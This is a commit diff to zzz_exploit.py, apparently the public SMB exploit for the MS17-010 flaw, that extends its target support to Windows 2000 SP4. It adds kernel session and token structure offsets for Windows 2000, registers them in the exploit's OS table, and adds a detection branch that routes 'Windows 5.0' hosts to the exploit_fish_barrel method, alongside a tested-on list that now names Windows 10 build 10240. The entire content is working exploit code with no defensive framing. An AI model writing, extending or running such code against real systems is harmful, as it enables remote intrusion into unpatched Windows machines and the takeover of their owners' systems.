support Windows 2000

zzz_exploit.py

@@ -15,6 +15,7 @@ Note:
 
 Tested on:
 - Windows 2016 x64
+- Windows 10 Pro Build 10240 x64
 - Windows 2012 R2 x64
 - Windows 8.1 x64
 - Windows 2008 R2 SP1 x64
@@ -27,6 +28,7 @@ Tested on:
 - Windows 2008 SP1 x86
 - Windows 2003 SP2 x86
 - Windows XP SP3 x86
+- Windows 2000 SP4 x86
 '''
 
 USERNAME = ''
@@ -153,6 +155,14 @@ WINXP_32_SESSION_INFO = {
 	'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
 }
 
+WIN2K_32_SESSION_INFO = {
+	'SESSION_ISNULL_OFFSET': 0x94,
+	'SESSION_SECCTX_OFFSET': 0x84,  # PCtxtHandle is at offset 0x80 but only upperPart is needed
+	'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
+	'TOKEN_USER_GROUP_CNT_OFFSET': 0x3c,
+	'TOKEN_USER_GROUP_ADDR_OFFSET': 0x58,
+}
+
 ###########################
 # info for exploitation
 ###########################
@@ -254,6 +264,9 @@ OS_ARCH_INFO = {
 		'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K3_32_SESSION_INFO),
 		'x64': merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO),
 	},
+	'WIN2K': {
+		'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K_32_SESSION_INFO),
+	},
 }
 
 
@@ -772,15 +785,19 @@ def exploit(target, pipe_name):
 		info['method'] = exploit_fish_barrel
 	elif server_os.startswith("Windows Server 2003 "):
 		info['os'] = 'WIN2K3'
-		info['method'] = exploit_fish_barrel		
+		info['method'] = exploit_fish_barrel
 	elif server_os.startswith("Windows 5.1"):
 		info['os'] = 'WINXP'
 		info['arch'] = 'x86'
-		info['method'] = exploit_fish_barrel		
+		info['method'] = exploit_fish_barrel
 	elif server_os.startswith("Windows XP "):
 		info['os'] = 'WINXP'
 		info['arch'] = 'x64'
-		info['method'] = exploit_fish_barrel		
+		info['method'] = exploit_fish_barrel
+	elif server_os.startswith("Windows 5.0"):
+		info['os'] = 'WIN2K'
+		info['arch'] = 'x86'
+		info['method'] = exploit_fish_barrel
 	else:
 		print('This exploit does not support this target')
 		sys.exit()